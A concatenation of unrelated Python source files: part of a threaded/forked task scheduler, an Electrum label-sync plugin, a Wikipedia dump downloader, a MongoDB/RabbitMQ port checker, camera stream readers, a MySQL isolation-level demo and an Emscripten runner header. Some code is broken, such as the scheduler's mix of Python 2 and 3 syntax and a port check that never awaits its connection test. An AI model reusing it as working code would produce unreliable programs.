self.action(*self.args, **self.kw)
try:
import threading
class ThreadedScheduler(Scheduler):
"""A Scheduler that runs in its own thread."""
def __init__(self):
Scheduler.__init__(self)
# we require a lock around the task queue
self._lock = threading.Lock()
def start(self):
"""Splice off a thread in which the scheduler will run."""
self.thread = threading.Thread(target=self._run)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
"""Stop the scheduler and wait for the thread to finish."""
Scheduler.stop(self)
try:
self.thread.join()
except AttributeError:
pass
def _acquire_lock(self):
"""Lock the thread's task queue."""
self._lock.acquire()
def _release_lock(self):
"""Release the lock on th ethread's task queue."""
self._lock.release()
class ThreadedTaskMixin:
"""A mixin class to make a Task execute in a separate thread."""
def __call__(self, schedulerref):
"""Execute the task action in its own thread."""
threading.Thread(target=self.threadedcall).start()
self.reschedule(schedulerref())
def threadedcall(self):
# This method is run within its own thread, so we have to
# do the execute() call and exception handling here.
try:
self.execute()
except Exception,x:
self.handle_exception(x)
class ThreadedIntervalTask(ThreadedTaskMixin, IntervalTask):
"""Interval Task that executes in its own thread."""
pass
class ThreadedSingleTask(ThreadedTaskMixin, SingleTask):
"""Single Task that executes in its own thread."""
pass
class ThreadedWeekdayTask(ThreadedTaskMixin, WeekdayTask):
"""Weekday Task that executes in its own thread."""
pass
class ThreadedMonthdayTask(ThreadedTaskMixin, MonthdayTask):
"""Monthday Task that executes in its own thread."""
pass
except ImportError:
# threading is not available
pass
if hasattr(os, "fork"):
import signal
class ForkedScheduler(Scheduler):
"""A Scheduler that runs in its own forked process."""
def __del__(self):
if hasattr(self, "childpid"):
os.kill(self.childpid, signal.SIGKILL)
def start(self):
"""Fork off a new process in which the scheduler will run."""
pid = os.fork()
if pid == 0:
# we are the child
signal.signal(signal.SIGUSR1, self.signalhandler)
self._run()
os._exit(0)
else:
# we are the parent
self.childpid = pid
# can no longer insert in the scheduler queue
del self.sched
def stop(self):
"""Stop the scheduler and wait for the process to finish."""
os.kill(self.childpid, signal.SIGUSR1)
os.waitpid(self.childpid, 0)
def signalhandler(self, sig, stack):
Scheduler.stop(self)
class ForkedTaskMixin:
"""A mixin class to make a Task execute in a separate process."""
def __call__(self, schedulerref):
"""Execute the task action in its own process."""
pid = os.fork()
if pid == 0:
# we are the child
try:
self.execute()
                except Exception as x:
self.handle_exception(x)
os._exit(0)
else:
# we are the parent
self.reschedule(schedulerref())
class ForkedIntervalTask(ForkedTaskMixin, IntervalTask):
"""Interval Task that executes in its own process."""
pass
class ForkedSingleTask(ForkedTaskMixin, SingleTask):
"""Single Task that executes in its own process."""
pass
class ForkedWeekdayTask(ForkedTaskMixin, WeekdayTask):
"""Weekday Task that executes in its own process."""
pass
class ForkedMonthdayTask(ForkedTaskMixin, MonthdayTask):
"""Monthday Task that executes in its own process."""
pass
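# A minimal usage sketch for the day-based tasks above (constructor signatures
# are taken from this module; backup_action is a placeholder callable, and the
# scheduler's add_*_task convenience helpers are not shown in this excerpt, so
# the task is queued here via reschedule(), which schedules it for tomorrow at
# the given time):
#
#   s = ThreadedScheduler()
#   task = ThreadedWeekdayTask("nightly backup", (1, 5), (8, 30), backup_action,
#                              args=[], kw={})
#   task.reschedule(s)
#   s.start()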
if __name__=="__main__":
def testaction(arg):
print ">>>TASK",arg,"sleeping 3 seconds"
time.sleep(3)
print "<<<END_TASK",arg
s=ThreadedScheduler()
s.add_interval_task( testaction, "test action 1", 0, 4, method.threaded, ["task 1"], None )
s.start()
print "Scheduler started, waiting 15 sec...."
time.sleep(15)
print "STOP SCHEDULER"
s.stop()
print "EXITING"
|
labels.py
|
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
import electrum_smart as electrum
from electrum_smart.plugins import BasePlugin, hook
from electrum_smart.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.electrum.org'
self.wallets = {}
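    # Labels are encrypted client-side: the AES key and IV are derived from the
    # wallet fingerprint in start_wallet(), so the remote sync server only ever
    # sees base64-encoded ciphertext and opaque wallet ids.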
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = electrum.bitcoin.aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = electrum.bitcoin.aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if wallet not in self.wallets:
return
if not item:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request_safe,
args=["POST", "/label", False, bundle])
        t.daemon = True
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise Exception(response.status_code, response.text)
response = response.json()
if "error" in response:
raise Exception(response["error"])
return response
def do_request_safe(self, *args, **kwargs):
try:
self.do_request(*args, **kwargs)
except BaseException as e:
#traceback.print_exc(file=sys.stderr)
            self.print_error('error doing request:', repr(e))
def push_thread(self, wallet):
wallet_data = self.wallets.get(wallet, None)
if not wallet_data:
raise Exception('Wallet {} not loaded'.format(wallet))
wallet_id = wallet_data[2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.items():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_data = self.wallets.get(wallet, None)
if not wallet_data:
raise Exception('Wallet {} not loaded'.format(wallet))
wallet_id = wallet_data[2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
def pull_thread_safe(self, wallet, force):
try:
self.pull_thread(wallet, force)
except BaseException as e:
# traceback.print_exc(file=sys.stderr)
            self.print_error('could not retrieve labels:', repr(e))
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
mpk = mpk.encode('ascii')
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread_safe, args=(wallet, False))
        t.daemon = True
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
wiki_dump_download.py
|
#from dotenv import load_dotenv
#load_dotenv()
import argparse
import glob
import hashlib
import json
import io
import logging
import os
import threading
import urllib.request
from datetime import datetime
#from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient
def get_dump_task(dump_status_file, data_path, compress_type, start, end, azure=False):
url_list = []
file_list = []
with open(dump_status_file) as json_data:
# Two dump types: compressed by 7z (metahistory7zdump) or bz2 (metahistorybz2dump)
history_dump = json.load(json_data)['jobs']['metahistory' + compress_type + 'dump']
dump_dict = history_dump['files']
dump_files = sorted(list(dump_dict.keys()))
if end > 0 and end <= len(dump_files):
dump_files = dump_files[start - 1:end]
else:
dump_files = dump_files[start - 1:]
# print all files to be downloaded.
print("All files to download ...")
for i, file in enumerate(dump_files):
print(i + start, file)
file_num = 0
for dump_file in dump_files:
file_name = os.path.join(data_path, dump_file)
file_list.append(file_name)
# url example: https://dumps.wikimedia.org/enwiki/20180501/enwiki-20180501-pages-meta-history1.xml-p10p2123.7z
url = "https://dumps.wikimedia.org" + dump_dict[dump_file]['url']
url_list.append(url)
file_num += 1
print('Total file ', file_num, ' to be downloaded ...')
json_data.close()
task = WikiDumpTask(file_list, url_list)
return task
def download(dump_status_file, data_path, compress_type, start, end,
thread_num, azure=False):
task = get_dump_task(dump_status_file, data_path, compress_type, start, end, azure)
threads = []
for i in range(thread_num):
t = threading.Thread(target=worker, args=(i, task, azure))
threads.append(t)
t.start()
logging.debug('Waiting for worker threads')
    main_thread = threading.current_thread()
for t in threading.enumerate():
if t is not main_thread:
t.join()
def existFile(data_path, cur_file, compress_type, container_client=None, azure=False):
if not azure:
exist_file_list = glob.glob(data_path + "*." + compress_type)
else:
exist_file_list = [b.name for b in container_client.list_blobs() if data_path in b.name]
exist_file_names = [os.path.basename(i) for i in exist_file_list]
cur_file_name = os.path.basename(cur_file)
if cur_file_name in exist_file_names:
return True
return False
def md5(file):
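    # Hash in ~40 MB chunks so multi-gigabyte dump files are never read into
    # memory at once.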
hash_md5 = hashlib.md5()
with open(file, "rb") as f:
for chunk in iter(lambda: f.read(40960000), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def verify(dump_status_file, compress_type, data_path):
print("Verify the file in folder:", data_path)
pass_files, miss_files, crash_files = [], [], []
with open(dump_status_file) as json_data:
# Two dump types: compressed by 7z (metahistory7zdump) or bz2 (metahistorybz2dump)
history_dump = json.load(json_data)['jobs']['metahistory' + compress_type + 'dump']
dump_dict = history_dump['files']
for i, (file, value) in enumerate(dump_dict.items()):
gt_md5 = value['md5']
print("#", i, " ", file, ' ', value['md5'], sep='')
if existFile(data_path, file, compress_type):
file_md5 = md5(data_path + file)
if file_md5 == gt_md5:
pass_files.append(file)
else:
crash_files.append(file)
else:
miss_files.append(file)
print(len(pass_files), "files passed, ", len(miss_files), "files missed, ", len(crash_files), "files crashed.")
if len(miss_files):
print("==== Missed Files ====")
print(miss_files)
if len(crash_files):
print("==== Crashed Files ====")
print(crash_files)
def main():
dump_status_file = args.dumpstatus_path
if args.verify:
verify(dump_status_file, args.compress_type, args.data_path)
else:
download(dump_status_file, args.data_path, args.compress_type,
args.start, args.end, args.threads, args.azure)
'''
WikiDumpTask class contains a list of dump files to be downloaded .
The assign_task function will be called by workers to grab a task.
'''
class WikiDumpTask(object):
def __init__(self, file_list, url_list):
self.lock = threading.Lock()
self.url_list = url_list
self.file_list = file_list
self.total_num = len(url_list)
def assign_task(self):
logging.debug('Assign tasks ... Waiting for lock')
self.lock.acquire()
url = None
file_name = None
cur_progress = None
try:
# logging.debug('Acquired lock')
if len(self.url_list) > 0:
url = self.url_list.pop(0)
file_name = self.file_list.pop(0)
cur_progress = self.total_num - len(self.url_list)
finally:
self.lock.release()
return url, file_name, cur_progress, self.total_num
'''
worker is main function for each thread.
'''
def worker(work_id, tasks, azure=False):
logging.debug('Starting.')
# Azure connection
container_client = None
    if azure:
        # The BlobServiceClient import is commented out at module level; import
        # it lazily here so non-Azure runs do not require the azure SDK.
        from azure.storage.blob import BlobServiceClient
        connect_str = os.getenv('AZURE_STORAGE_CONNECTION_STRING')
        blob_service_client = BlobServiceClient.from_connection_string(connect_str)
        container_client = blob_service_client.get_container_client(args.container_name)
# grab one task from task_list
while 1:
url, file_name, cur_progress, total_num = tasks.assign_task()
if not url:
break
logging.debug('Assigned task (' + str(cur_progress) + '/' + str(total_num) + '): ' + str(url))
if not existFile(args.data_path, file_name, args.compress_type, container_client, azure):
if not azure:
urllib.request.urlretrieve(url, file_name)
else:
page = urllib.request.urlopen(url)
file = io.BytesIO(page.read())
blob_client = blob_service_client.get_blob_client(container=args.container_name,
blob=file_name)
blob_client.upload_blob(file)
logging.debug("File Downloaded: " + url)
else:
logging.debug("File Exists, Skip: " + url)
logging.debug('Exiting.')
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='WikiDump Downloader')
parser.add_argument('--data-path', type=str, default="./data/raw/", help='the data directory')
parser.add_argument('--dumpstatus_path', type=str, default='./data/raw/dumpstatus.json')
parser.add_argument('--compress-type', type=str, default='bz2',
help='the compressed file type to download: 7z or bz2 [default: bz2]')
parser.add_argument('--threads', type=int, default=3, help='number of threads [default: 3]')
    parser.add_argument('--start', type=int, default=1, help='the first file to download [default: 1]')
parser.add_argument('--end', type=int, default=-1, help='the last file to download [default: -1]')
parser.add_argument('--verify', action='store_true', default=False,
                        help='verify the dump files in the specified path')
parser.add_argument('--azure', action='store_true', default=False,
help='whether to save to azure')
parser.add_argument('--container_name', type=str, default='wikipedia-data',
help='Azure storage container name')
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)s) %(message)s',
)
start_time = datetime.now()
main()
time_elapsed = datetime.now() - start_time
print('Time elapsed (hh:mm:ss.ms) {}'.format(time_elapsed))
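# Example invocation (a sketch; paths and the file range are placeholders, and
# dumpstatus.json for the chosen dump date must already exist at the given path):
#   python wiki_dump_download.py --data-path ./data/raw/ \
#       --dumpstatus_path ./data/raw/dumpstatus.json \
#       --compress-type 7z --start 1 --end 10 --threads 4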
|
checker.py
|
import asyncio
import json
from time import time
from typing import Dict
from pymongo import MongoClient
from multiprocessing import Process
from os import getenv
import pika
import argparse
from monitor.config import Env
class CheckerService():
_monitors = []
_rest_config = {}
_start_time: int
_forks = []
    # argument defaults are sourced from these environment variables; those without a fallback must be set
_env_args = {
"CHECKER_ADDRESS": Env('address', str, '127.0.0.1'),
"CHECKER_PORT": Env('port', int, '8081'),
"CHECKER_DB_CONN_STRING": Env('server', str, None),
"CHECKER_DATABASE_NAME": Env('database', str, None),
"CHECKER_AMQP_NAME": Env('amqp', str, None),
"CHECKER_FORKS_NUM": Env('forks', int, 4),
"CHECKER_WORKERS_NUM": Env('workers', int, 4),
}
def __init__(self):
self._rest_config = self.load_args()
def load_args(self):
def _read_env_args() -> Dict:
defaults = dict()
for env_var, arg in self._env_args.items():
try:
env = arg.env_type(getenv(env_var, arg.env_default))
if env is not None:
defaults[arg.env_name] = env
except:
raise Exception(
"checker.py: Environment variable '{}'(of type '{}') is not set to a type-valid default value.".format(
env_var, arg[1]))
return defaults
def create_parser():
parser = argparse.ArgumentParser(
                prog='checker.py',
description='''Monitoring service Checker''',
epilog='''(c) Alexander Tolkachev 2017.''',
add_help=True
)
# cmd arguments are optional and override or complement environment defaults
parser.add_argument('--address', type=str, help='Listening Address', required=False)
parser.add_argument('--port', type=int, help='Listening Port', required=False)
parser.add_argument('--db', type=str, help='Database connection string', required=False)
parser.add_argument('--database', type=str, help='Monitoring database name', required=False)
parser.add_argument('--amqp', type=str, help='AMQP server', required=False)
parser.add_argument('--forks', type=int, help='Amount of Forks', required=False)
parser.add_argument('--workers', type=int, help='Amount of Workers', required=False)
return parser
# getting defaults from the env - all values guaranteed
config = _read_env_args()
parser = create_parser()
args, unknown = parser.parse_known_args()
arg_dict = {'server': args.db,
'database': args.database,
'forks': args.forks,
'workers': args.workers,
'amqp': args.amqp}
config.update({k: v for k, v in arg_dict.items() if v is not None})
return config
def load_monitors(self):
monitors = []
data = self.monitor_collection.find()
for obj in data:
monitor = {"id": int(obj['id']), "port": int(obj["port"]), "address": obj['address'], "alive": obj['alive']}
monitors.append(monitor)
self._monitors = monitors
return len(self._monitors)
def init_db(self):
self.client = MongoClient(self._rest_config['server'], connect=False)
self.db = self.client[self._rest_config['database']]
self.alert_collection = self.db['alerts']
self.monitor_collection = self.db['monitor']
def start_monitor(self):
self.init_db()
monitor_count = self.load_monitors()
if (monitor_count == 0):
print("There is no monitors in Database")
else:
print("{} monitors loaded.".format(monitor_count))
self.init_amqp()
def start_listen_monitor(self):
def listen_monitor(channel):
channel.queue_declare(queue='monitor')
print('Connected to RabbitMQ')
def callback(ch, method, properties, body):
decoded_body = body.decode()
reload = json.loads(decoded_body)
if (reload['reload']):
self.restart_monitors()
self.load_monitors()
print("Monitors reloaded")
ch.basic_ack(delivery_tag=method.delivery_tag)
return
channel.basic_qos(prefetch_count=1)
channel.basic_consume(on_message_callback=callback, queue='monitor')
channel.start_consuming()
self.init_amqp()
listen_monitor(self.connection.channel())
async def start_publish(self):
async def publish_alerts():
channel = self.connection.channel()
channel.queue_declare(queue='alerts', durable=True)
while True:
self.load_monitors()
for monitor in self._monitors:
channel.basic_publish(exchange='', routing_key='alerts', body=json.dumps(monitor))
await asyncio.sleep(2)
self.start_monitor()
await asyncio.gather(publish_alerts())
def listen_alerts(self):
async def listen_alerts_queue():
connection = pika.BlockingConnection(
pika.ConnectionParameters(host=self._rest_config['amqp'],
credentials=pika.PlainCredentials('guest', 'guest'),
virtual_host="/"))
channel = connection.channel()
channel.queue_declare(queue='alerts', durable=True)
def callback(ch, method, properties, body):
decoded_body = body.decode()
monitor = json.loads(decoded_body)
try:
self.monitor_item(monitor)
                except Exception as e:
                    print("Monitor check failed for {}: {}".format(monitor.get('id'), e))
ch.basic_ack(delivery_tag=method.delivery_tag)
return
channel.basic_qos(prefetch_count=1)
channel.basic_consume(on_message_callback=callback, queue='alerts')
channel.start_consuming()
async def run_listeners():
tasks = []
for i in range(self._rest_config['workers']):
tasks.append(listen_alerts_queue())
await asyncio.gather(*tasks)
self.start_monitor()
alerts_loop = asyncio.new_event_loop()
# asyncio.set_event_loop(alerts_loop)
alerts_loop.run_until_complete(run_listeners())
async def run_monitors(self):
while True:
tasks = []
for item in self._monitors:
# await asyncio.gather(self.monitor_item(item))
tasks.append(self.monitor_item(item))
# await asyncio.wait(tasks)
await asyncio.gather(*tasks)
await asyncio.sleep(5)
def monitor_item(self, item):
response = ''
status = True
self._start_time = time()
connector = asyncio.open_connection(host=item['address'], port=item['port'])
try:
asyncio.wait_for(connector, timeout=0.3)
response = 'Success'
except:
status = False
response = 'Failed'
finally:
print("Monitor {}: Test {}:{} - {}".format(item['id'], item['address'], item['port'], response))
self.update_monitor(monitor=item, status=status)
connector.close()
def update_monitor(self, monitor, status):
update_time = int(time())
if monitor['alive'] != status:
self.monitor_collection.find_one_and_update({'id': monitor['id']},
{'$set': {"alive": status, 'since': update_time}})
monitor['alive'] = status
def init_amqp(self):
self.connection = pika.BlockingConnection(
pika.ConnectionParameters(host=self._rest_config['amqp'],
credentials=pika.PlainCredentials('guest', 'guest'),
virtual_host="/")
)
def restart_monitors(self):
if self._forks:
for i in self._forks:
i.terminate()
self._forks = []
for i in range(self._rest_config['forks']):
p = Process(target=self.listen_alerts, args=())
self._forks.append(p)
p.start()
async def run_amqp_processes(check):
p = Process(target=check.start_listen_monitor, args=())
p.start()
await check.start_publish()
def run_checker():
check = CheckerService()
check.restart_monitors()
loop = asyncio.get_event_loop()
loop.run_until_complete(run_amqp_processes(check))
loop.close()
if __name__ == '__main__':
run_checker()
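# Example invocation (a sketch; the connection strings are placeholders, and the
# CHECKER_* variables below correspond to the defaults read in load_args):
#   CHECKER_DB_CONN_STRING="mongodb://localhost:27017" \
#   CHECKER_DATABASE_NAME="monitoring" \
#   CHECKER_AMQP_NAME="localhost" \
#   python checker.py --forks 2 --workers 4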
|
stream.py
|
# import the necessary packages
import numpy as np
import time
from threading import Thread
import requests
import cv2
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
self.stream.release()
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.grabbed, self.frame
def release(self):
# indicate that the thread should be stopped
self.stopped = True
class IPCamVideoStream:
def __init__(self, url):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = requests.get(url, stream=True)
self.frame = np.zeros((360, 480, 3), np.uint8)
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
databytes = b''
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
data = self.stream.raw.read(1024)
databytes += data
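            # MJPEG-over-HTTP framing: each JPEG frame is delimited by the SOI
            # marker (0xff 0xd8) and the EOI marker (0xff 0xd9); extract and
            # decode the next complete frame found in the byte buffer.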
a = databytes.find(b'\xff\xd8')
b = databytes.find(b'\xff\xd9')
if a != -1 and b != -1:
jpg = databytes[a:b+2]
databytes = databytes[b+2:]
                img = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)
img = np.array(img)
self.frame = img
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class Client:
def __init__(self, rtsp_server_uri):
"""
        rtsp_server_uri: the path to an RTSP server. Should start with "rtsp://".
"""
self.rtsp_server_uri = rtsp_server_uri
self.open(rtsp_server_uri)
def __enter__(self,*args,**kwargs):
""" Returns the object which later will have __exit__ called.
This relationship creates a context manager. """
return self
def __exit__(self, type=None, value=None, traceback=None):
""" Together with __enter__, allows support for `with-` clauses. """
self.close()
def open(self,rtsp_server_uri=None):
if rtsp_server_uri:
self.rtsp_server_uri = rtsp_server_uri
else:
rtsp_server_uri = self.rtsp_server_uri
self._capture = RTSPVideoFeed(rtsp_server_uri)
def isOpened(self):
return self._capture.isOpened()
def read(self):
""" Return most recent frame as Pillow image. Returns None if none have been retrieved. """
return self._capture.read()
def preview(self):
self._capture.preview()
def close(self):
self._capture.close()
class RTSPVideoFeed:
""" Maintain live RTSP feed without buffering. """
_stream = None
_latest = None
def __init__(self, rtsp_server_uri, verbose = False):
"""
rtsp_server_uri: the path to an RTSP server. should start with "rtsp://"
verbose: print log or not
"""
self.rtsp_server_uri = rtsp_server_uri
self._verbose = verbose
def __enter__(self,*args,**kwargs):
""" Returns the object which later will have __exit__ called.
This relationship creates a context manager. """
return self
def __exit__(self, type=None, value=None, traceback=None):
""" Together with __enter__, allows support for `with-` clauses. """
self.close()
def open(self):
self.close()
self._stream = cv2.VideoCapture(self.rtsp_server_uri)
time.sleep(.5)
def close(self):
if self.isOpened():
self._stream.release()
def isOpened(self):
try:
return self._stream is not None and self._stream.isOpened()
except:
return False
def read(self):
self.open()
(grabbed, frame) = self._stream.read()
self._latest = frame
self._stream.release()
return self._latest
def preview(self):
""" Blocking function. Opens OpenCV window to display stream. """
win_name = 'RTSP'
cv2.namedWindow(win_name, cv2.WINDOW_AUTOSIZE)
cv2.moveWindow(win_name,20,20)
self.open()
while(self.isOpened()):
cv2.imshow(win_name,self._stream.read()[1])
#if self._latest is not None:
# cv2.imshow(win_name,self._latest)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
cv2.waitKey()
cv2.destroyAllWindows()
cv2.waitKey()
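# Minimal usage sketch (the RTSP URI is a placeholder for a reachable camera):
#   with Client('rtsp://user:pass@192.168.1.10:554/stream') as cam:
#       frame = cam.read()   # latest frame as a BGR numpy array, or None
#       if frame is not None:
#           cv2.imwrite('snapshot.jpg', frame)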
|
test_mysql.py
|
import pymysql
import pymysql.cursors
from multiprocessing import Process
import time
def get_connection():
con = pymysql.connect(
host='localhost',
user='root',
password='example',
db='l8_1_db',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor
)
    con.autocommit(False)
return con
def ensure_tables():
con = get_connection()
with con:
con.query("""
CREATE TABLE IF NOT EXISTS tbl1 (
id INT NOT NULL AUTO_INCREMENT,
f1 INT NOT NULL,
f2 INT NOT NULL,
PRIMARY KEY (id)
)
""")
con.query('SET autocommit=0')
con.query('SET GLOBAL innodb_status_output=ON')
con.query('SET GLOBAL innodb_status_output_locks=ON')
con.commit()
def ensure_data():
con = get_connection()
with con:
con.query('DELETE FROM tbl1')
con.query('INSERT INTO tbl1 (f1, f2) VALUES (1, 0)')
con.query('INSERT INTO tbl1 (f1, f2) VALUES (2, 0)')
con.commit()
def print_table():
con = get_connection()
with con:
with con.cursor() as cursor:
cursor.execute('SELECT * FROM tbl1')
results = cursor.fetchall()
print(results)
def lost_update():
print('==========================LOST UPDATE========================')
def session1():
con = get_connection()
with con:
con.begin()
with con.cursor() as cursor:
cursor.execute('UPDATE tbl1 SET f2=f2+20 WHERE f1=1;')
print('session1: update finished')
con.commit()
def session2():
con = get_connection()
with con:
con.begin()
with con.cursor() as cursor:
cursor.execute('UPDATE tbl1 SET f2=f2+25 WHERE f1=1;')
print('session2: update finished')
con.commit()
p1 = Process(target=session1)
p1.start()
p2 = Process(target=session2)
p2.start()
p1.join()
p2.join()
print('=============================================================')
def dirty_read():
print('==========================DIRTY READ========================')
def session1():
con = get_connection()
with con:
con.begin()
with con.cursor() as cursor:
cursor.execute('SELECT f2 FROM tbl1 WHERE f1=1')
                print('session1: select finished %s' % cursor.fetchmany())
cursor.execute('UPDATE tbl1 SET f2=f2+1 WHERE f1=1')
print('session1: update finished')
time.sleep(2)
con.rollback()
print('session 1: rollback')
def session2():
con = get_connection()
with con:
con.begin()
time.sleep(1)
with con.cursor() as cursor:
cursor.execute('SELECT f2 FROM tbl1 WHERE f1=1')
                print('session 2: select finished %s' % cursor.fetchmany())
con.commit()
print('session 2: commit')
p1 = Process(target=session1)
p1.start()
p2 = Process(target=session2)
p2.start()
p1.join()
p2.join()
print('=============================================================')
def non_repeatable_read():
print('======================NON REPEATABLE READ======================')
def session1():
con = get_connection()
with con:
con.begin()
with con.cursor() as cursor:
cursor.execute('SELECT f2 FROM tbl1 WHERE f1=1')
                print('session 1: select finished %s' % cursor.fetchmany())
time.sleep(0.01)
cursor.execute('UPDATE tbl1 SET f2=f2+1 WHERE f1=1')
print('session 1: update finished')
con.commit()
print('session 1: commit')
def session2():
con = get_connection()
with con:
con.begin()
time.sleep(0.01)
with con.cursor() as cursor:
cursor.execute('SELECT f2 FROM tbl1 WHERE f1=1')
                print('session 2: first select finished %s' %
cursor.fetchmany())
time.sleep(2)
cursor.execute('SELECT f2 FROM tbl1 WHERE f1=1')
                print('session 2: second select finished %s' %
cursor.fetchmany())
con.commit()
print('session 2: commit')
p1 = Process(target=session1)
p1.start()
p2 = Process(target=session2)
p2.start()
p1.join()
p2.join()
print('=============================================================')
def phantom_read():
print('======================PHANTOM READ======================')
def session1():
con = get_connection()
with con:
con.begin()
time.sleep(1)
with con.cursor() as cursor:
cursor.execute('INSERT INTO tbl1 (f1, f2) VALUES (15,20)')
print('session 1: insert finished')
con.commit()
print('session 1: commit')
def session2():
con = get_connection()
with con:
con.begin()
with con.cursor() as cursor:
cursor.execute('SELECT sum(f2) FROM tbl1')
                print('session 2: first select finished %s' %
cursor.fetchmany())
time.sleep(2)
cursor.execute('SELECT sum(f2) FROM tbl1')
                print('session 2: second select finished %s' %
cursor.fetchmany())
con.commit()
print('session 2: commit')
p1 = Process(target=session1)
p1.start()
p2 = Process(target=session2)
p2.start()
p1.join()
p2.join()
print('=============================================================')
TRANSACTION_LVLS = [
'READ UNCOMMITTED',
'READ COMMITTED',
'REPEATABLE READ',
'SERIALIZABLE',
]
def test_levels():
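    # SET GLOBAL changes the default isolation level only for sessions opened
    # after the statement runs, which is why every scenario below creates fresh
    # connections of its own.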
ensure_tables()
for level in TRANSACTION_LVLS:
print('=============TRANSACTION LEVEL = %s ====================' % level)
con = get_connection()
with con:
with con.cursor() as cursor:
cursor.execute(
'SET GLOBAL TRANSACTION ISOLATION LEVEL %s' % level)
con.commit()
for case in [lost_update, dirty_read, non_repeatable_read, phantom_read]:
ensure_data()
case()
print_table()
if __name__ == '__main__':
    test_levels()
|
runner.py
|
#!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from __future__ import print_function
from subprocess import PIPE, STDOUT
from functools import wraps
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import shlex
import shutil
import string
import subprocess
import sys
import tempfile
import time
import unittest
import webbrowser
if sys.version_info.major == 2:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote, unquote_plus
else:
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
